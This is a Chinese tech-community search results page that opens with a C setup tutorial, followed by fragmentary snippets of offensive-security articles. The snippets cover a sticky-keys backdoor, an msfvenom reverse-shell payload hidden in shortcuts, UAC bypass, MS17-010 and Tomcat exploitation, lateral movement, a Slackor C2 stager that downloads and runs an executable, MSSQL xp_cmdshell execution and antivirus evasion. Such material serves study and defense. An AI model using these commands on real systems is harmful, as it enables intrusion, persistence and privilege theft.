首页
学习
活动
专区
圈层
工具
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

C语言 | C语言开发环境搭建以及第一个程序遇到的错误

1、开发环境搭建以及编写第一个C程序 这里网上已经有很多教程了,我就不再造轮子,直接上一个我觉得写得还不错得链接:VS Code配置C语言开发环境的超详细教程 - 知乎 (zhihu.com) 2、运行程序时遇到的坑...错误1:运行代码报错 报错显示: gcc : 无法将“gcc”项识别为 cmdlet、函数、脚本文件或可运行程序的名称。...请检查名称的拼写,如果包括路径,请确保路径正确,然后再试一次。...,设置步骤如下: 找到Code.exe位置 右键打开属性→找到兼容性→勾选以管理员身份运行此程序→点击应用 设置完成后重启vscode,完美解决~ 错误2:调试模式报错 报错显示: Unable to...Unexpected GDB output from command "-environment -cd xxx" No such file or 解决办法: 就一步:中文路径的问题,改掉就行

80520
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    权限维持之shift后门

    将c:windows/system32/sethc.exe替换为cmd.exe文件,达到新增用户、修改账号密码的的目的。...当然,除了这个程序之外,还有以下多个程序的快捷方式: 屏幕键盘:C:\Windows\System32\osk.exe 放大镜:C:\Windows\System32\Magnify.exe 旁白:C:...\Windows\System32\Narrator.exe 显示切换器 C:\Windows\System32\DisplaySwitch.exe 应用切换器:C:\Windows\System32\...环境准备 实验主机:Windows7旗舰版 (无任何杀软) 3. shift后门复现 3.1测试是否存在粘滞键 在正常登录的Windows7用户桌面连续摁5次shift键,看是否有粘滞键提示弹出: 此时有弹出...通过解密可知当前密码为:admin 3.6 删除新增用户 此时将机器重启,利用test admin进行登录,再将当前的test2用户删除: 进入环境之后,发现是无法找到cmd程序的,因此在这里需要找到已经修改过的

    1.2K20

    利用快捷方式隐藏并执行shellcode

    0x00:简介 快捷方式是win系统下为各种程序、文件、文件夹提供的一种快速启动程序。 后缀名大多为(.lnk),少见的后缀名有(.pif)、(.url)。 早期的“桌面图标lnk木马”也是危害一时。...0x01:环境准备 1、MSF 2、UPX(pip install upx) 3、数字签名添加器(https://www.ttrar.com/html/7418.html) 4、Phpstudy 5、攻击机器...1、编码、捆绑(正常的32位calc.exe) msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp -e x86/shikata_ga_nai...cmd.exe,所以上传的程序就是cmd.exe) 2、jaky666.exe查杀 http://r.virscan.org/language/zh-cn/report/8773a7a9dfd1a48becd614e70bc689d3...或者更加高明的隐藏 3、该“恶意程序”只是做了简单的免杀,甚至并不免杀。

    1.6K20

    Permission elevation

    ,首先会读取其Manifest信息,如果autoElevate字段存在且为true则认为其是可自动提升权限的程序,且会检查其系统的签名,然后还会检查其文件是否处于可信任目录中C:\Windows\System32...\\C:\\Windows " md "\\\\?\\C:\\Windows \\System32"  copy c:\\windows\\system32\\winsat.exe "\\\\?...我们可以利用ExportsToC++或者AheadLib来获取导出函数。这里我用的ExportsToC++去导出d3d11.dll的函数。这里的dll要是原始目录下的dll文件。...这里的dll要填写如下格式。 C:\\\\Windows\\\\System32\\\\d3d11.dll 点击ok即可获取导出函数。 重命名后将其放入白名单文件的同一目录中。...获取组策略凭据 在大型环境环境或域环境中,管理员往往会通过下发组策略对所有加入域的计算机的本地管理员密码进行批量修改; 新建一个组策略后,域控制器会在SYSVOL共享目录中生成一个XML文件,在文件保存了组策略更新后的密码

    95140

    利用Pentestbox打造MS17-010移动杀器

    /EQGRP_Lost_in_Translation/tree/master python环境 必须在Python2.6 和 pywin32-221环境下,如果你用其他环境,会报各种诸如模块/dll缺失等错误...然后我们把windows文件夹复制到pentestbox目录下 ? 这里我把windows里的文件放到pentestbox根目录下的ms17-010文件夹内 ?...,我一般不用它,我通常是在自己的vps服务器进行监听 本地测试时候可以找一台kali攻击机 dll木马我们可以提前生成好放在u盘里带着,随时备用*_* 接下来我们用Msf进行监听 use exploit...设置dll木马路径,我已经提前生成好放在u盘里随身携带,随时备用~ ? ? 然后设置要注入的程序,默认是lsass.exe ?...\windows\\system32  #上传文件 search –d c:\\windows –f *.mdb     #在目标主机Windows目录中搜索文件s 执行程序 execute

    1.4K71

    批处理变量详谈

    使用SET命令可以列出环境变量,如下: %ALLUSERSPROFILE% 本地 返回 "所有用户" 配置文件的位置 %APPDATA% 本地 返回默认情况下应用程序存储数据的位置 %CD% 本地 返回当前目录字符串...也就是返回 cmd.exe 的路径,一般在 C:\WINDOWS\system32\cmd.exe %DATE% 系统 返回当前日期字符串。...由 Cmd.exe 生成 %RANDOM% 系统 返回 0 到 32767 之间的任意十进制数字。...由 Cmd.exe 生成 %SYSTEMDRIVE% 系统 返回包含Windows server operation system根目录(即系统根目录)的驱动器 %SYSTEMROOT% 系统 返回 Windows...c:/ 然后输入 test.bat 我是第一个参数 我是第二个参数 我是第三个参数 我是第四个参数 注意中间的空额,我们会看到这样的结果: 我是第一个参数 我是第二个参数 我是第三个参数

    86120

    基础免杀手法暴风吸入

    forfiles /p 指定搜索文件的目录 /m 指定搜索关键词 /c 指定要执行的命令 forfiles /p c:\windows\system32 /m calc.exe /c c:\tmp\evil.exe.../windows/system32/calc.exe" cmd.exe /c "ping ;a.exe; 127.0.0.1/../../../../../../../../.....其细分思路就包括怎么把shellcode进行混淆了,简单的有XOR,BASE64,复杂一点的有AES等。 这里就只说说xor。 首先我们得准备一个程序将shellcode进行混淆。...沙箱对恶意程序的检测流程大致如下 1.启动虚拟环境 2.将恶意程序复制进虚拟环境 3.运行恶意程序一段时间(一般为5分钟) 4.获取虚拟环境返回的报告 5.关机 全程不过6.7分钟,而正常的机器运行时间肯定是大于这个值的...,启动exe文件应该是双击运行,程序启动后父进程是explore.exe,如果是cmd运行则会是cmd.exe、 但是对于沙箱就有可能存在用一个程序如windbg来启动我们的恶意EXE文件,这个时候我们就需要对此点进行检测

    1.5K10

    关于bypassuac的探究

    挖掘白名单的uac程序 有一些系统程序是会直接获取管理员权限同时不弹出UAC弹窗,这类程序被称为白名单程序。这些程序拥有autoElevate属性的值为True,会在启动时就静默提升权限。...\\Windows\\System32\\cmd.exe", (LPSTR)"/c C:\\Windows\\System32\\ComputerDefaults.exe", NULL, NULL, FALSE...char filePath[] = "C:\\Windows\\System32\\cmd.exe"; 实现效果如下 bypassuac1 这里cmd的实现成功了,那么直接使用cs的马上线能不能够直接...cs的木马,第一个就是我们通过我们写的程序上线的,第二个就是直接点击上线的,看一下区别 仔细看的话这里bypass过的右上角有一个* image-20211017101100492 首先看一下第一个对话...获取到的权限也是bypassuac后的权限 image-20211017102832575 再看一下360,这里我试了两个方法,第一种方法是直接对artifact.exe做一下免杀,然后执行bypassuac.exe

    1K10

    ApacheTomca远程执行代码(CVE-2019-0232)漏洞浅析和复现

    CGI脚本用于执行Tomcat Java虚拟机(JVM)外部的程序。默认情况下禁用的CGI Servlet用于生成从查询字符串生成的命令行参数。...由于Java运行时环境(JRE)将命令行参数传递给Windows的错误,在启用CGI Servlet参数enableCmdLineArguments的Windows计算机上运行的Tomcat服务器很容易受到远程代码执行的影响...ProcessImpl()构建Cmdline并将其传递给CreateProcess() Windows函数,之后CreateProcess() 在cmd.exe shell环境中执行.bat和.cmd...然后CreateProcess()在阶段1重新启动,批处理文件的名称作为cmd.exe的第一个参数传递。...这导致’hello.bat …’成为’C:\ Windows \ system32 \cmd.exe / c“hello.bat …” ’。

    2.7K10

    【内网安全】 横向移动&Wmi&Smb&CrackMapExec&ProxyChains&Impacket

    是Windows子系统的内核部分,是一个内核模式设备驱动程序,它 包含有窗口管理器、后者控制窗口显示和管理屏幕输出等。...如果Windows内核模式驱动程序不正确地处 理内存中的对象,则存在一个特权提升漏洞。成功利用此漏洞的攻击者可以运行内核模式中的任意代 码。...攻击者随后可安装程序;查看、更改或删除数据;或者创建拥有完全管理权限的新帐户。...在Win10中,wmic已经归入C:\Windows\System32\wbem文件夹,而环境变量只设置到C:\Windows\System32,因此找不到wmic 只需要添加C:\Windows\System32.../administrator:@192.168.3.32 create -name shell -display shellexec -path C:\Windows\System32\shell.exe

    10710

    Slackor:Go语言写的一款C&C服务器

    编译 注意:服务器是用Python 3编写的 为此您需要准备 1.Slack工作区 2.并为slack应用设置以下权限: channels:read channels:history channels:...powershell.exe iwr [URL] -o C:\Users\Public\[NAME].exe; forfiles.exe /p c:\windows\system32 /m svchost.exe...stager - 生成单行程序以下载执行植 quit - 退出程序 wipefiles - 从Slack中删除所有上传的文件 代理进入后,您可以与其进行交互。...以下是几个不执行cmd.exe/的OPSEC安全命令bash: - cat - 打印文件内容 - cd - 更改目录 - find - 搜索目录文件名 - getip - 获取外部IP地址(发出DNS请求...代理程序是针对Windows,Mac和Linux编译的,但主要是使用Windows 10进行测试。代理程序可能会错误处理该代理程序平台不支持的命令(不要尝试对Mac进行小型化)。 它的规模如何?

    1.8K10

    关于bypassuac的探究

    挖掘白名单的uac程序 有一些系统程序是会直接获取管理员权限同时不弹出UAC弹窗,这类程序被称为白名单程序。 这些程序拥有autoElevate属性的值为True,会在启动时就静默提升权限。...\\Windows\\System32\\cmd.exe", (LPSTR)"/c C:\\Windows\\System32\\ComputerDefaults.exe", NULL, NULL, FALSE...char filePath[] = "C:\\Windows\\System32\\cmd.exe"; 实现效果如下 bypassuac1.gif 这里cmd的实现成功了,那么直接使用cs的马上线能不能够直接...cs的木马,第一个就是我们通过我们写的程序上线的,第二个就是直接点击上线的,看一下区别 仔细看的话这里bypass过的右上角有一个* image-20211017101100492.png 首先看一下第一个对话...-20211017102642754.png 获取到的权限也是bypassuac后的权限 image-20211017102832575.png 再看一下360,这里我试了两个方法,第一种方法是直接对artifact.exe

    1.6K20

    数据库安全之MSSQL渗透

    在学习MSSQL过程中也阅读了几十篇中英文MSSQL相关技术文章,最终按照作者我的思路进行总结,相关参考文章也在文中有列出。此外,文中可能会出现部分错误,望读者指出,谢谢。...\windows\system32\cmd.exe /c whoami >c:\\sqltest.txt';回显0表示成功 由于这里是无回显的命令执行,到另一台主机上查看效果,成功写入。...openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe...\windows\system32\ias\ias.mdb','select shell("cmd.exe /c whoami >c:\\sqltest.txt ")'); 在win2003的c盘上看到已经创建了该文件...\windows\system32\cmd.exe' 2)查看是否修改成功文件 exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft

    6.4K10
    领券